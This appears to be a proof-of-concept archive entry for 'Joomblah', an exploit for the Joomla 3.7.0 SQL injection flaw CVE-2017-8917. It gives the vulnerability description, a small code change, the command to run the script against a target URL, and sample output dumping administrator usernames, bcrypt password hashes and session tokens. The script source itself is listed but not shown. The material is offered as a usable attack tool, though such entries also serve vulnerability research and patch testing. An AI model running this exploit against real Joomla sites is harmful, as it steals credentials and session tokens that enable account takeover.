PoC details: 6a14fe627dcc74a8473a146c936fb4563deb654c

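Source
Related vulnerability
Title: Joomla! SQL injection vulnerability (CVE-2017-8917)
Description: Joomla! is an open-source, cross-platform content management system (CMS) developed in PHP and MySQL by the US-based Open Source Matters team. A SQL injection vulnerability exists in Joomla! 3.7.x versions before 3.7.1. A remote attacker can exploit it to execute arbitrary SQL commands.
Description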
CVE-2017-8917 SQL injection Vulnerability in Joomla! 3.7.0 exploit
Introduction
# Joomblah
Exploit for Joomla 3.7.0 (CVE-2017-8917)

Explanation about the vulnerability:

https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html 

## Code modification
Line 46 was modified to decode the extracted value as UTF-8 before appending it to the result:

```python
...
 result += value.decode('utf-8')
...
```

## Usage
Point the joomblah.py script at the vulnerable Joomla 3.7.0 install. It may take some time, but it will dump the users and session tables.

```
$ python joomblah.py http://127.0.0.1:8080
                                                                                                                    
    .---.    .-'''-.        .-'''-.                                                           
    |   |   '   _    \     '   _    \                            .---.                        
    '---' /   /` '.   \  /   /` '.   \  __  __   ___   /|        |   |            .           
    .---..   |     \  ' .   |     \  ' |  |/  `.'   `. ||        |   |          .'|           
    |   ||   '      |  '|   '      |  '|   .-.  .-.   '||        |   |         <  |           
    |   |\    \     / / \    \     / / |  |  |  |  |  |||  __    |   |    __    | |           
    |   | `.   ` ..' /   `.   ` ..' /  |  |  |  |  |  |||/'__ '. |   | .:--.'.  | | .'''-.    
    |   |    '-...-'`       '-...-'`   |  |  |  |  |  ||:/`  '. '|   |/ |   \ | | |/.'''. \   
    |   |                              |  |  |  |  |  |||     | ||   |`" __ | | |  /    | |   
    |   |                              |__|  |__|  |__|||\    / '|   | .'.''| | | |     | |   
 __.'   '                                              |/'..' / '---'/ /   | |_| |     | |   
|      '                                               '  `'-'`       \ \._,\ '/| '.    | '.  
|____.'                                                                `--'  `" '---'   '---' 

 [-] Fetching CSRF token
 [-] Testing SQLi
  -  Found table: rlbre_users
  -  Found table: tgukl_users
  -  Extracting users from rlbre_users
 [$] Found user ['361', 'Super User', 'admin', 'admin@example.com', '$2y$10$G4ivaKw71R4uIvuHYliSke5pHoh1Q.xm.Sk29d8zpzx4xJBfPoyEK', '', '']
  -  Extracting sessions from rlbre_session
 [$] Found session ['361', '3rfv8kql26s6kvimpbchneom85', 'admin']
  -  Extracting users from tgukl_users
 [$] Found user ['883', 'Super User', 'admin', 'admin@example.com', '$2y$10$5Za2zpqTdRo5x19cvO5biOKeiyOi2iTQ3u0SSLtcs6uvIvJhvM9aG', '', '']
  -  Extracting sessions from tgukl_session
```
## Licence
Licensed under the [WTFPL](http://www.wtfpl.net/).

Credits: original code by @XiphosResearch
File snapshot
 [4.0K]  /data/pocs/6a14fe627dcc74a8473a146c936fb4563deb654c
├── [7.3K]  joomblah.py
└── [2.5K]  README.md

0 directories, 2 files